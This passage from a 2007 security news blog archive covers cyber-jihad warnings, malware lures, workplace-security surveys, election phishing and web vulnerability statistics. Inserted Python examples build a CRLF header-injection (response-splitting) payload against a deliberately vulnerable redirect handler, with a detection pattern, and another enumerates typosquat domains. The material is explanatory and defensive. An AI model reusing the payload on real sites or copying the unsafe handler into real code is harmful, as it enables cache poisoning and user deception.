October 31, 2007 | Comments: (0)
Security researchers highlight potential cyber-Jihad
Citing reports published in Debkafile -- an Israeli news outlet that boasts a behind-the-scenes view into Middle East military conflicts and terrorist activity -- security researchers are warning of a potential "cyber-Jihad" set of attacks to be carried out by backers of Osama Bin Laden in mid-November.
If the newest cyber-terrorism reports prove to be accurate, attackers may also have an updated and more comprehensive malware tool in their hands to help carry out the effort, according to experts at Secure Computing.
Debkafile -- which bases many of its news stories on tips from unidentified sources and has published erroneous reports of potential terrorist threats in the past -- said in a news story posted online that Bin Laden and his al Qaeda supporters released an electronic announcement detailing their planned cyber-attacks on Monday.
"On Sunday, Nov. 11, al Qaeda's electronic experts will start attacking Western, Jewish, Israeli, Muslim apostate and Shiite Web sites," the announcement read, according to Debkafile. "On day one, they will test their skills against 15 targeted sites [and then] expand the operation from day-to-day thereafter until hundreds of thousands of Islamist hackers are in action against untold numbers of anti-Muslim sites."
The news site said that the announcement was transmitted in Arabic and intercepted by unnamed "counter-terrorism" sources.
The al Qaeda threat also reportedly promised an impenetrable e-mail network for use by potential volunteers participating in the attacks through which they will be able to contact and receive instructions from project leaders and communicate with others involved in the campaign.
The effort is being carried out in retaliation for the tactics of Western intelligence agencies, which have been actively taking down terrorist support Web sites, Debkafile reported.
Security researchers have long debated the validity of threats of cyber-terrorism.
For the most part such attacks have proven over-hyped, but the potential for coordinated campaigns, and the damage they might inflict on critical infrastructure, has been thoughtfully played out in recent years in books such as cyber-terrorism expert Richard A. Clarke's novel "Breakpoint."
Previous announcements offering similar threats of impending "cyber-Jihads" -- including some that carried almost the same language as the newest report -- have proven inaccurate, such as one released in Oct. 2001 that closely followed the 9/11 attacks.
Among the few real ties established between radical Muslim groups and online attacks in recent years are reports by security researchers detailing the existence of groups such as the Q8Army -- a malware distribution and botnet control outfit believed to operate out of the Middle East, which has been known to distribute messages of "world domination" by radical Muslims along with its virus code.
According to Chris Boyd, a researcher with messaging software maker FaceTime Communications who has tracked botnet operators and attempted to follow the flow of the groups' financial resources, Q8Army has used some of the funds derived via its network of online schemes to purchase mobile communications gear, laptop computers and other types of field equipment.
Some people believe that the massive denial-of-service attack carried out against Estonian Web sites earlier this year -- believed to be spearheaded by Russian hackers angry with Estonian government policies -- was a precursor to the types of cyber-terrorist threats the world will actually see more of in the coming years.
Security researchers at software maker Secure Computing say that despite the fact that previous cyber-Jihad attacks haven't materialized, potential participants in such a scheme may already have a powerful new tool in their hands.
The mass distribution of a comprehensive "electronic Jihad software program" over the last several years may be cause for concern, Secure said.
The application offers a point-and-click user interface for use by aspiring participants -- which may have greatly expanded the reach of the malware tool, based on its improved ease-of-use -- Secure said in an e-mail sent to reporters on Wednesday.
Secure also said that the program -- which it has labeled as Electronic Jihad Version 2.0 -- is being supported by multiple Web sites that offer tutorials on its use, including some that the company has captured and translated into English.
The latest version of the software also adds expanded coordination capabilities, Secure said, which are meant to help users of the program aim their efforts at the same sites being attacked by others employing the program, according to the company.
We'll see what happens on Nov. 11.
Posted by Matt Hines on October 31, 2007 12:28 PM
October 30, 2007 | Comments: (0)
Happy Halloween: Malware costumes trick or treat
With Halloween lurking tomorrow evening, I'm sure that some of you, like me, are scratching your heads trying to come up with a fresh idea to impress all the peeps at your favorite annual costume bash.
It dawned on me some time ago that there are some great potential alternatives to choose from, costume-wise, when considering all the characters that make up the oddball world of IT security.
Considering this context, one can select from security-oriented outfits including hackers, crackers and cyber-criminals (try to look rich and indifferent), as well as trade show booth babes, shoddily-clad AV marketing execs, tech journalists (mandatory goatee, eyeglasses, and stomach paunch), VC-backed start-up CEOs (obligatory giant new watch) or even some of the types of people you run into at Black Hat and DefCon each year (wear a black T-shirt and try to look jaded at all times).
Of course, the hackneyed hacker world costume idea of the year (if your friends are just as geeky as you are, dear readers) might be to dress up like NBC "Dateline" Producer Michelle Madigan, wearing a blond wig and "hidden" microphone, and then run away as soon as anyone asks who you're supposed to be and pretend to call your bosses on your cell phone.
The same M.O. got Madigan a lot of attention at DefCon after all -- just don't expect to win any prizes or get much candy. Or to tape a sensationalistic undercover TV show.
My personal preference might be to dress up as an Eastern European hacker, as all it would involve is a rumpled Member's Only jacket, three days of beard growth and strikingly strong cigarette breath -- but as this outfit so closely resembles my personal appearance it probably misses the idea of changing one's feathers for the holiday occasion. Alas.
Anyway, the funny guys over at F-Secure have developed a list of popular malware schemes that try to hide their identities, and tabbed them with some costume-oriented themes.
They may not help you woo that attractive JavaScript coder dressed up like Yuna from "Final Fantasy" at your party tomorrow night, but hey, they're giving bloggers like me a chance to weave some colorful Halloween joy into this otherwise black-and-white world.
According to F-Secure, some of the best malware costumes over the past few years have been:
The Chameleon: Attacks like the Storm Worm that shift their colors on a seemingly endless basis. Today's e-mail porn is tomorrow's new YouTube video, or maybe it's a game or an e-card. The fun just never ends with this group. The treat is that you get to see a cruddy image or a broken Java game. The trick is you get to join a massive worldwide botnet. Good times.
The Bill Collector: Viruses like Haxdoor that claim to be related to online purchases or eBay transactions that never really happened. The treat is that the advertised e-commerce problem actually never occurred. The trick is that after you download the virus, your machine will get swamped with keyloggers and rootkits, and then it will really happen.
The Starlet: A time-honored favorite that made Anna Kournikova nearly as famous for her link to malware as she was made famous for her, um, tennis skills? You just can't help yourself, there aren't enough malware-free images of naked women on the Net for you. You… must… click… the… link. The treat is that you get to see some racy pic. The trick is that hackers get to see the inside of your bank account.
The Casanova: We all remember the LoveLetter e-mail, that romantic-themed attack that arrived as a plea from a long-lost lover for further explanation of your wandering ways. If you fall for this one, you probably don't deserve to have any money in your PayPal account because you're already a lecherous creep. Or you're just sensitive and vulnerable. Treat is that you think someone cares about you, deeply. Trick is that the only one who cares is some dude in Estonia who wants to hack your eTrade account.
The Hero: Like the Swen.A virus, attacks that disguise themselves as something helpful, like a security update from Microsoft. Treat is that you think you're improving the protection of your computer. Trick is that you've now made your OS even less secure than Microsoft made it out of the box. Boo.
Enjoy the evening.
Posted by Matt Hines on October 30, 2007 02:12 PM
October 29, 2007 | Comments: (0)
Auditors - employees missing big picture risks
If your company is undergoing any type of IT security audit this year, there's a strong likelihood that the experts who come in the door to test your systems will be somehow associated with, or certified by, ISACA.
The nonprofit organization -- formerly known as the Information Systems Audit and Control Association -- serves as an industry body representing the professionals who carry out regulatory audits covering SOX, HIPAA and PCI -- among other regulations, and who will become intimately familiar with all the weak points of your company's networks, applications and security policies -- should you have any. (writer stifles laugh)
In a new study to be released later this week, ISACA is sharing the results of a survey it sponsored that reviews just how significantly the human factor is currently playing into the whole process of IT security.
The results highlight the fact that, despite all the strong technology and comprehensive processes that many organizations have pushed to adopt in recent years, it is in fact people who remain one of the most significant vulnerabilities inside many business environments today.
For starters, ISACA's study -- which was actually carried out by MARC Research, through phone interviews with roughly 300 white-collar workers during Q3 2007 -- found that 35 percent of those surveyed admitted to violating their company's security policies at least once.
Combine those results with the notion that many of these types of incidents also likely occur without employees' knowledge of their mistakes, and the survey result gains even more weight in terms of its overall gravity.
Among the technologies that the workers interviewed admitted to using that could compromise their employers' policies were P2P file-sharing services, with 15 percent of those surveyed claiming to have utilized the tools while at work.
P2P applications are frequently cited by security researchers as an increasingly popular vehicle for delivering malware and other attacks to end users, or for creating botnets of infected devices.
Seemingly even worse, 65 percent of those interviewed reported that they are unconcerned with securing their privacy while using a workplace computer in general, and 63 percent said that they do not worry about the security of the information they handle at work whatsoever.
Somehow I'm thinking those people interviewed were not working at large financial service companies… but consider that they likely could be working at retailers or some other type of company that holds your personal information, someone like TJX Companies, for instance.
Of those people who said they are not worried about organizational security issues as they go about their work, 74 percent said that they do not feel it is a risk to their employer to download personal software onto their work PCs, even if some of it might constitute malware or some program that could lead to infection.
Consider that security researchers frequently cite well-known and widely-used applications including IM and VoIP client software programs as among the most popular avenues for potential attacks today.
The more worrisome group of respondents to the ISACA study also identified personal e-mail as another favorite application they feel appropriate for work usage, with 73 percent admitting that they tend to use the tools while on the job.
How dire a situation that fact might indicate is again unclear based on the types of jobs these people surveyed are performing. For instance, if they're reading Gmail while working in anything other than a tightly-controlled environment where workers have access to lots of sensitive data that could be copied -- or they aren't working at a financial services firm where outside e-mail is typically banned -- this result might not be surprising or shocking.
On the other hand, if they are in one of those more security-centric settings, it's a really big deal.
In addition to providing a means for contracting potential malware attacks using such a tool that essentially flies under the network's radar, the ability to cut-and-paste corporate information and send it out of the company network presents a massive risk for leakage or corporate espionage.
ISACA takes a predictably conservative stance on the use of such programs, and a lack of security acumen among workers, since it backs these auditors who are performing the work. But consider the implications for the auditors themselves, some of whom will be responsible for handing out failing compliance grades that lead to financial penalties, or even jail time, for those responsible for securing the systems that are being tested.
At the end of the day the most important thing is that workers understand the implications of their jobs in terms of how they affect your organization's bigger-picture considerations, experts with the group maintain.
"Companies and employees should be very concerned about their personal and corporate data in light of this information," said John Pironti, a security expert at services provider Getronics who also reps for ISACA. "A single seemingly harmless activity, such as using peer-to-peer networks while at work, can breach the confidentiality and security of an entire corporate network, including all of the documents, data and internal communications that reside on that network."
Such research forces one to consider just when it will be that the companies who are being audited and/or experiencing data leaks begin seeking jail time and civil penalties against workers who fail to follow corporate policies.
My guess is not long now.
Posted by Matt Hines on October 29, 2007 09:39 AM
October 25, 2007 | Comments: (0)
California fires, heated politics stoke online schemes
Websense PR chief Cas Purdy sent along details of the security vendor's experiences this week as the wild fires raged across Southern California and around its San Diego headquarters.
Along with some other personal stories and images shared by friends in San Diego, it sounds like it was a pretty hairy week for a lot of people in the area, if not at least a very stressful time for an even greater number.
Websense's headquarters is located in an area that was never evacuated, and Purdy said that the company leaned on procedures it installed after another set of serious fires touched the region in 2003 to keep everything running smoothly throughout the week.
The company let its employees work from home after the incident began to widen rapidly on Tuesday, Purdy said, and redundancy plans installed after the 2003 fires handled any related shifts in technical and customer support operations. The vendor also maintains worldwide data operations in the name of providing failsafe services to its customers, he said.
Alas, Websense also points out in a blog today that online scammers have already begun focusing their sights on the California fires.
The company specifically pointed out that a number of seemingly questionable eBay auctions have been set up in the last two days by people asking for donations and claiming to represent various public agencies, including local fire departments and the Red Cross.
At least one auction posting out of Brooklyn, N.Y., Thursday afternoon advertised bids in support of a poorly-described effort pledging support for children affected by the fires. However, the seller listed in the eBay auction has carried out some 200 transactions in the last year, with a near-perfect user experience rating -- pointing to either a misunderstanding, or a hijacked eBay account being used to carry out the campaign.
Websense merely points to a similar ad and warns people to keep their guard up when looking to donate through legitimate channels.
In another interesting twist on the headline-chasing trend among malware, spam and online scam brokers -- the trend that has helped power the Storm Worm into what by most estimates was, or remains, a titanic Trojan-fed P2P botnet -- researchers at AV software maker F-Secure unearthed some nasty politically-fed attacks in Africa this week.
In an attack that the Finnish firm discovered in Kenya, it appears that someone is trying to discredit one of the East African nation's current presidential candidates, Stephen Kalonzo Musyoka -- a former foreign minister in the Sub-Saharan country -- using a malware program advertised in his name that damages end users' Windows-based computers.
After luring people to download the program with a Windows-style pop-up that references the candidate's "vision," the Trojan -- dubbed Trojan:W32/Agent.DPL by F-Secure -- directs an affected computer's browser to the candidate's official Web site while simultaneously tampering with the machine's Windows registry.
Once the program has infected a PC, the user is unable to locate Windows functions via the taskbar controls. According to researchers at F-Secure (who most certainly must be celebrating the F1 automobile racing championship of countryman Kimi Raikkonen, the third such Finnish driver to win the illustrious title) it is likely that some opponents of Musyoka have launched the attack to cut into his overall credibility.
The social and physical fires that burn around the world clearly continue to provide ample fuel to stoke the fires of online deceit.
Posted by Matt Hines on October 25, 2007 03:56 PM
October 16, 2007 | Comments: (0)
Study - Unapproved apps costly to security
You might want to stop using Skype, BitTorrent and World of Warcraft at the office, unless your IT department has approved the technologies (or if, you know, you actually want to get any work done).
FaceTime Communications has published its third annual report on security costs related to the use of so-called greynets -- identified by the company as consumer-oriented communications applications dragged into the workplace without permission from IT -- and the security company maintains that the technologies are currently costing enterprise customers roughly twice as much as one year ago.
According to FaceTime's yearlong survey of 700 employees and IT managers regarding their use and tolerance of greynets, it is nearly impossible to find an enterprise where the applications aren't popping up all over the place.
The report finds that there were an average of nine greynets in use within each of the enterprises interviewed for the study, with 99 percent of IT managers reporting the use of at least one greynet in their organizations (and those are only the ones they actually know about).
Even worse, the applications -- which FaceTime calls out for posing "myriad network and information security risks" related to malware, intellectual property loss, identity theft and compliance risks -- are leading to real attacks, as nine out of ten respondents to the survey reported that their company has dealt with a greynet-related security incident sometime in the last six months.
Meanwhile, only three percent of those participating claimed to have avoided greynet-related security problems altogether.
While FaceTime includes applications such as IM and VoIP which are often allowed by IT departments in its study, the company warns that less savory tools such as P2P file sharing systems, video streaming tools, and IP address "anonymizers" shouldn't be allowed by anyone looking to keep their networks protected.
And even in the case of IM and VoIP systems such as Skype, the company is reminding security workers looking to ban the applications that they often "circumvent the traditional security infrastructure designed for e-mail and standard Web traffic."
Based on the survey, the average cost companies have incurred in repairing any damage from greynet-related security incidents on company PCs has more than doubled over last year. Those IT managers surveyed reported that it cost them an average of almost $289,000 to repair or re-image PCs after malware attacks over greynets in the last year alone. The 2006 greynet study charted an average financial impact of only $130,000 per year.
On average, the report contends that IT managers experience nearly 39 greynet-driven incidents per month that require their attention, costing them roughly nine hours of work.
One of the biggest problems with the tools appears to be that end users seem willing to continue to use the technologies even after being told not to do so.
For instance, some 80 percent of IT managers surveyed labeled anonymizers -- which permit anonymous use of the Internet -- as "risky" to corporate networks. Yet, some 57 percent of end users responded that the tools aren't dangerous.
Even IM, perhaps the most innocuous of the applications (outside of tightly regulated or protected environments where it is forbidden), appears to strike IT workers and end users differently. Some 40 percent of IT managers responded that they feel that public IM use at work poses "serious risk," while another 46 percent said that IM poses "some risk," for a total of 86 percent.
Overall, 36 percent of the employees surveyed said that they have the right to download any tools that help them do their jobs, with 40 percent claiming that they already need the additional programs to do so.
Another problem highlighted in the study is the blurring of the line between personal and work devices -- which FaceTime names as one of the most significant greynet risks. Some 85 percent of those interviewed admitted that they use their work PCs for "personal, non-work purposes."
"This suggests to us that work-provided machines are being used more than ever to download whatever these users feel they need for their work and personal lives with little regard to policies or security," said Frank Cabri, vice president of marketing and product management for FaceTime. "Oftentimes this perception among workers is at odds with what IT people want, which is some level of ability to control, monitor and manage what people are doing on their work PCs."
Cabri contends that companies need to do a better job of keeping workers informed of their policies related to greynet usage, and to implement technological means to try and block the use of applications -- when it seems feasible.
"These IT shops need to understand what employees feel they need to be productive and give them alternatives; sending an IM to a friend probably shouldn't be a violation unless you're working in an industry that forbids it through some type of regulation," he said. "What this problem truly warrants is understanding from both sides to better understand all the needs and risks involved."
"Most people don't intend to download malware intentionally, but they also have to know what clicking on a URL or IM could do to their organizations, and if a company can't get people to change their behavior, they should implement applications control tools and other filters to enforce their policies in real time," said Cabri.
"There's no one way to handle this problem, but if you can use something to let people know that you're watching when they do something that violates policy, there's a much better chance that people will change their behaviors."
Posted by Matt Hines on October 16, 2007 01:33 PM
October 15, 2007 | Comments: (0)
Study - 90 percent of all sites at hacking risk
Despite the continued efforts of security researchers, search engine providers and hosting companies to help Web site operators better understand the range of attacks feasting on the Internet -- and in particular the wide range of tactics being used to exploit unprotected but otherwise legitimate URLs -- the latest numbers from WhiteHat Security contend that the problem is only getting worse.
In a new research report, WhiteHat -- the Web application security firm founded by vulnerability scanning whiz Jeremiah Grossman -- concludes that as many as 90 percent of all the sites that it has tested in the last year remain open to some form of hijack or infection.
The leading problem remains many sites' vulnerability to cross-site scripting (XSS) hacks, through which attackers place malicious code on legitimate sites to trick end users into handing over their personal information or passwords.
As many as 75 percent of the pages scanned by WhiteHat had some form of XSS-exploitable flaw, according to the paper.
Information leakage -- or the ability to break into areas of a site where potentially sensitive data is stored -- remains another serious problem, according to the company, which reported that the problem ranks as the "top vulnerability class" of all the weaknesses it is finding among the sites it has tested -- including XSS-based threats.
WhiteHat also highlighted the increased prevalence of several other types of exploits among the sites it is watching, including SQL Injection and HTTP Response Splitting. The emergence of those attacks can be directly related to the increased use of vulnerability identification technologies, the firm contends.
The company said that HTTP Response Splitting remains "hugely misunderstood and underestimated" and that it continues to evade most scanning tools. As a result, the threats are "startling both in the prevalence and potential consequences" at present, WhiteHat said.
In a recent blog, Grossman described HTTP Response Splitting attacks as such:
"The best way to think about Response Splitting is that it's executed similarly to Cross-Site Scripting (XSS), but more powerful. Take a loose analogy of a written letter in an envelope. XSS targets the message inside the envelope, while Response Splitting targets not only the message inside the envelope, but the envelope itself."
"There are several different variations of Response Splitting and many emergent behaviors that make accurate vulnerability identification challenging."
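To make the "envelope" analogy concrete, here is an added example (not WhiteHat's or Grossman's code) of the redirect pattern that underlies Response Splitting: a hypothetical handler that copies an untrusted `next` parameter into a Location header, the hardened version that refuses control characters, and a counter that shows why a scanner looking only at the first response misses the split. The payload is a constructed test input.

```python
from urllib.parse import unquote

CRLF = "\r\n"

# Constructed test input: an attacker-supplied "next" parameter as it would
# arrive URL-encoded in a query string. Once decoded it carries CR/LF pairs
# that close the redirect's header block and begin a second, attacker-written
# response (Content-Length 21 matches the 21-byte body that follows).
SPLIT_PARAM = unquote(
    "/home%0d%0aContent-Length:%200%0d%0a%0d%0a"
    "HTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a"
    "Content-Length:%2021%0d%0a%0d%0a%3Ch1%3ENot%20the%20site%3C/h1%3E"
)


def build_redirect_unsafe(next_url: str) -> bytes:
    """Vulnerable handler (hypothetical): the untrusted value is pasted into
    the Location header verbatim. HTTP delimits headers with CR/LF, so a value
    containing CR/LF rewrites the envelope, not just the message inside it."""
    headers = [
        "HTTP/1.1 302 Found",
        "Location: " + next_url,
        "Content-Length: 0",
    ]
    return (CRLF.join(headers) + CRLF + CRLF).encode("latin-1")


def is_safe_header_value(value: str) -> bool:
    """Reject CR, LF and every other ASCII control character. This is the
    check a hardened handler applies before any user-controlled string
    reaches a header; current HTTP libraries generally enforce it as well."""
    return not any(ord(c) < 0x20 or ord(c) == 0x7F for c in value)


def build_redirect_safe(next_url: str) -> bytes:
    """Hardened handler: same framing, but the value is validated first."""
    if not is_safe_header_value(next_url):
        raise ValueError("refusing to place control characters in a header")
    return build_redirect_unsafe(next_url)


def count_status_lines(raw: bytes) -> int:
    """Count HTTP status lines in a wire-level response. A value above 1 is
    the tell-tale sign that the header block was split into two responses;
    a scanner that parses only the first response never sees the second."""
    return sum(1 for line in raw.split(b"\r\n") if line.startswith(b"HTTP/1."))


def has_crlf_injection(request_url: str) -> bool:
    """Detection heuristic for proxy or access logs: flag request URLs that
    carry encoded or double-encoded CR/LF, the signature of a splitting
    attempt. Tune the token list to the application's own encoding habits."""
    lowered = request_url.lower()
    return any(token in lowered for token in ("%0d", "%0a", "%250d", "%250a"))


if __name__ == "__main__":
    print("benign redirect, status lines:",
          count_status_lines(build_redirect_unsafe("/account")))
    print("split redirect, status lines:",
          count_status_lines(build_redirect_unsafe(SPLIT_PARAM)))
    try:
        build_redirect_safe(SPLIT_PARAM)
    except ValueError as exc:
        print("hardened handler:", exc)
```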
WhiteHat has also begun to warn people about the increased use of Cross-Site Request Forgery.
As part of the third annual WhiteHat Security Statistics Report -- which the testing firm plans to begin issuing quarterly -- the company has also begun looking at the manner in which different vulnerabilities appear to be more popular in individual vertical industries.
For instance, the company found that while Web site security remains weak in general, the retail sector has managed to secure its URLs better than some other markets. As in the rest of the online world, however, WhiteHat contends that XSS threats top the list of vulnerability classes by vertical, followed closely by Information Leakage.
"These statistics continue to reveal recurring and emerging issues that are affecting Web sites across industries," said Grossman, who wears the title of CTO at WhiteHat. "As increasing amounts of sensitive data are stored online, WhiteHat remains vigilant about alerting companies to common attack methods and emphasizing the importance of Web site vulnerability management as part of their overall security posture."
Posted by Matt Hines on October 15, 2007 01:23 PM
October 09, 2007 | Comments: (0)
The politics of cyber-crime
As the presidential race of 2008 nears, there appear to be very few certainties that can be applied to the political runoff.
Beyond the fact that President George W. Bush's tumultuous tenure in the Oval Office will come to a close -- and that e-voting technologies will likely come under a new wave of fire from security researchers -- one other concrete detail appears to be that malware authors, phishers and other assorted cyber-scum will attempt to take advantage of interest in the election to deliver a new wave of attacks.
Last week, Carnegie Mellon University's CyLab project hosted the Anti-Phishing Working Group's eCrime Researchers Summit. As part of the event, a panel of experts including Symantec researcher Oliver Friedrichs debated the various methods that online assailants will employ to aim their wares at unsuspecting voters.
In a blog post on the company's Web site, Friedrichs outlined some of the conclusions that he and the other experts arrived at regarding the upcoming political-security firestorm. The other panelists were Rachna Dhamija from Harvard University, Chris Soghoian from Indiana University, and Pat Clarke of Jackson/Clark Partners.
Friedrichs also took the opportunity to plug a new book he has contributed to dubbed "Crimeware" -- due out in Feb. 2008 -- which will touch on the political-security issue, among many others apparently. Symantec, which will publish the book, has been kind enough to pass along the chapter on this topic free-of-charge to anyone interested in reading it.
Some highlights:
-The existing candidates have not done a thorough job of snapping-up domain names that could be easily associated with their campaigns by attackers looking to ensnare end users.
According to Friedrichs, Symantec performed an analysis of 17 well-known candidate domain names to seek out domain speculators and typo squatters.
"Our results were interesting to say the least," he said. "Candidates have not done a good job at protecting themselves."
A quick exercise in attempting to create URLs that people might fall for finds that some of the obvious ones have been taken by the aspiring presidents, such as www.barackobama.com. However, URLs like www.clintonwhitehouse.com and www.giulianicommittee.com bring up largely undeveloped pages -- likely acquired by squatters hoping to cash-in -- that openly advertise themselves for sale to any interested parties.
One popular technique will be for criminals to create "cousin" sites that closely mimic the candidates' legitimate Web pages, as in, www.mitt-romney.com (currently under the control of someone who pitches themselves as an unofficial supporter), versus www.mittromney.com (the candidate's real site).
Squatters and phishers will also piggyback on the typo sites as well, such as www.mitromney.com (currently home to another unofficial supporter), Friedrichs said.
Parody sites and unofficial informational sites (such as those listed above) will also be used to carry out attacks, according to the research.
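The kind of look-alike enumeration described above, as an added example rather than Symantec's own analysis: it generates omission, transposition, doubled-letter and hyphenated "cousin" variants of a campaign domain and sorts them into the buckets a campaign's security team would act on. The registrar data is a constructed stand-in; a real run would replace it with WHOIS or DNS lookups.

```python
def lookalike_domains(domain: str) -> set:
    """Enumerate common typo and cousin variants of one registrable domain.
    The rules are the usual ones: drop a character (mitromney), double a
    character (mitttromney), swap adjacent characters (mtitromney), and
    insert a hyphen anywhere (mitt-romney)."""
    name, tld = domain.lower().rsplit(".", 1)
    out = set()
    for i in range(len(name)):
        out.add(name[:i] + name[i + 1:])                 # omission
        out.add(name[:i + 1] + name[i] + name[i + 1:])   # doubled character
    for i in range(len(name) - 1):
        out.add(name[:i] + name[i + 1] + name[i] + name[i + 2:])  # transposition
    for i in range(1, len(name)):
        out.add(name[:i] + "-" + name[i:])               # hyphenated cousin
    out.discard(name)                                    # never report the real name
    return {n + "." + tld for n in out}


def classify(domain: str, owned: set, registered: set) -> dict:
    """Split the look-alikes into three buckets:
    held_by_others    - registered, but not by the campaign: watch or dispute
    defensively_owned - already registered by the campaign itself
    available         - unregistered, candidates for defensive registration"""
    found = lookalike_domains(domain)
    return {
        "held_by_others": sorted(found & (registered - owned)),
        "defensively_owned": sorted(found & owned),
        "available": sorted(found - registered),
    }


# Constructed stand-in for registrar data (the two squatted names come from the
# post above; "mittromny.com" is an invented defensive registration).
REGISTERED = {
    "mittromney.com", "mitromney.com", "mitt-romney.com",
    "mittromny.com", "barackobama.com",
}
CAMPAIGN_OWNED = {"mittromney.com", "mittromny.com"}


if __name__ == "__main__":
    report = classify("mittromney.com", CAMPAIGN_OWNED, REGISTERED)
    print("held by others:   ", report["held_by_others"])
    print("defensively owned:", report["defensively_owned"])
    print("available:        ", len(report["available"]), "variants")
```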
-The threat of phishing has only grown more severe.
"When considering the 2004 election as a whole, phishing presented only a marginal risk," said Friedrichs. "At the time, phishing itself was still in its infancy, and had yet to grow into the epidemic that can be observed today. When we revisit the potential risk of phishing to the 2008 federal election, we find ourselves in a much different position."
Since online political fundraising and campaigning has become so ubiquitous (I get an e-mail from the DNC every day it seems), the researcher contends it will be relatively easy for attackers to craft effective phishing runs that take advantage of the election buzz.
After performing some additional analysis, Friedrichs suggests that the most dangerous threats will likely seek to siphon donations away from legitimate candidates.
Even worse, he believes that people who want to undermine the whole process of garnering online donations will do so by purposefully diverting funds from one candidate to another with opposing beliefs and then publicizing it to discourage the Web-based fundraising practice.
-Adware will be used to "influence or manipulate" voters.
In addition to using fake candidate sites to deliver traditional adware and malware, the Symantec researchers believe that politically-minded attackers could carry out schemes to "silently replace advertisements for one candidate with another."
According to the report, these scams would likely be carried out by manipulating incoming HTML in end users' browsers before it is rendered, or by overlaying their own ad on top of another.
-Spyware may be used to skew election-related data gathering.
Friedrichs points out that spyware programs could be used to capture telltale political end user behavior, such as Web browsing habits, party affiliation, online campaign contributions and e-mail traffic.
With that information in hand, the researcher contends, politically-motivated organizations could conduct secret polls or election-result sweeps that are essentially fixed beforehand to benefit some candidate or another, or to motivate people to get out and vote.
And there are plenty of other scenarios that could use attacks to alter the campaigning process as well.
Now, about those e-voting machines…
Posted by Matt Hines on October 9, 2007 10:20 AM
October 08, 2007 | Comments: (0)
Records security plans still lagging
One of the biggest problems facing companies when they discover a data leakage incident à la TJX Companies is that they finally realize that they don't have a firm handle on just where all their information resides.
It's a story that's repeated time-and-time again by post-breach forensics experts -- whose first job upon being hired after an incident is typically to try and backtrack to figure out just what types and volumes of data have been exposed, and how.
According to a new study from data archiving and storage back-up specialists Iron Mountain, one of the primary reasons that companies often find themselves in this unenviable position is because they lack an enterprise-wide records management strategy in the first place.
In fact, in a recent study that the company completed with 2000 IT professionals and legal experts employed by its customers, roughly 65 percent of those interviewed admitted that they have no over-arching records retention, storage, back-up and management strategy.
The Compliance Benchmark Study published by Iron Mountain on Wednesday illustrates just why so many companies are having trouble protecting themselves from data incidents and responding to them quickly when they occur, according to Laura McDaniel, director of compliant records management at the firm.
"It's interesting that there's still a lot of room to go, even though there is a greater awareness level regarding this issue than ever there's been," McDaniel said. "From a records management standpoint, most companies may have some sort of retention schedule or policies or procedures in place, but many are still in the dark ages in terms of adopting these rules across their entire organization, especially for electronic records."
Despite the current shortcomings, Iron Mountain found that most firms are trying to improve their standing, with 61 percent of those surveyed reporting that they are committed to enterprise-wide records management and in the process of outlining new strategies.
Among the other findings:
-Oversight of records management remains unclear in many organizations:
A vast majority (73 percent) of respondents said that leadership of their corporate records management programs was "not clearly defined," with many noting that steering committees meant to address the issue have "limited participation from key stakeholders."
Iron Mountain recommends that businesses establish a senior-level committee to help set direction and push policies down to rank-and-file workers.
-Records retention is consistent:
Some 81 percent of those interviewed said that they already have a retention schedule that manages records retention as it relates to compliance programs and provides a "blueprint" for all related activities.
Iron Mountain advises that businesses should establish a universal records retention schedule across all of their business units, covering all of their records, regardless of the content's media format.
-Records retrieval is typically accurate and speedy:
Roughly 90 percent of respondents rated their ability to gather records as "effective and accurate."
Iron Mountain said these responses indicate that most companies are satisfied with their ability to retrieve records, and that most organizations appear to understand the basics of record storage, indexing and retrieval.
However, the company contends that organizations should always be looking to improve policies and procedures to speed record recovery.
-Secure destruction practices are inconsistent:
Only 38 percent of the organizations surveyed reported that they already have a uniform set of policies in place for the disposal of confidential information, despite many government and industry regulations that require businesses to do so.
Iron Mountain advises that companies should be more consistent, launching comprehensive, organization-wide plans for destruction of both active and inactive records.
Companies that participated in the benchmark study can use the results to educate key stakeholders and decision makers in their organization to make improvements to their records management program.
"The good news is that most companies are realizing that they're way under-prepared and that they need to do more than what they're doing currently," said McDaniel. "But most companies do not know where data is and that's part of the early homework; it's very challenging for companies to get arms around this problem, but our advice is to take it one-step-at-a-time and build a multi-year plan."
Posted by Matt Hines on October 8, 2007 12:42 PM
October 04, 2007 | Comments: (0)
Getting more bang from your IT security bucks
It's no secret that enterprise customers are getting fed up with how much money they're spending on security these days, but one analyst claims that many businesses could get a lot more out of their investments by simply choosing technologies more wisely and taking a closer look at the projects they're involved in.
At next week's (Oct. 7-12) Gartner Symposium/ITxpo 2007 in Orlando, Neil MacDonald, a longtime security analyst who also wears the title of "fellow" at the research firm, will give a presentation (Tuesday at 8 am) dubbed "Fifteen Ways to Spend Less and Become More Secure" during which he'll outline his concepts.
Lucky for all you Zero Day readers who aren't paying to attend the show, we got a sneak peek for free.
According to MacDonald, current enterprise security budgets are "all over the map" with spending ranging anywhere from 3.5 percent of companies' overall IT purses, to as much as 20 percent, with the average being something close to 11.7 percent.
While vendors might not like to hear it, the analyst said this illustrates that many companies are overspending significantly, as he estimates that an intelligent security budget should account for anywhere from 3-6 percent of overall IT spend.
Yet, with all the varieties of threats out there and the pressure to open up infrastructure to greater numbers of shared services and business partners, clearly the process of defending corporate IT assets and data is becoming even more challenging.
"People want to open up more and the attacks are getting harder to spot, but, the spending that's going on just can't continue like it has -- the spending trajectory cannot continue to increase unabated," the analyst said. "What we have now is almost a worst case scenario from a business and management perspective."
Some of MacDonald's tips for reining in spending follow:
-Companies should take a more process-based approach to security -- addressing different problems should not be approached as a set of projects; it should instead be handled as a set of processes, he said.
For instance, when dealing with configuration management, MacDonald recommends that companies employ a strategy of looking at the configuration and vulnerability status of every device on the network from a process standpoint before investing in automated tools to address problems.
"Without a process, you can't accurately isolate the right technologies to help automate; there are good tools out there, but you have to investigate which ones fit your environment the best before buying," he said.
-Companies should avoid high-cost projects.
Many high-level, expensive projects that have become popular in recent years -- including single sign-on, risk dashboards, digital rights management and ID access management -- aren't worth all the effort and spend some companies are throwing at them, the analyst said; he believes that the problems they aim to solve can be addressed in faster, cheaper ways.
"Companies need to stop chasing rainbows and unicorns on projects that never seem to end and have a life of their own," said MacDonald. "A lot of these things have become perennial budget items when in reality they are typically only aimed at getting patchworks in place until better industry solutions arrive."
"For something like single sign-on, companies can use Active Directory; DRM among trading partners might not be feasible to build or sustainable for the long term. Companies should limit that type of project only to people who really need it, for specific groups of workers."
-Ditch best-of-breed for integrated security tools when possible.
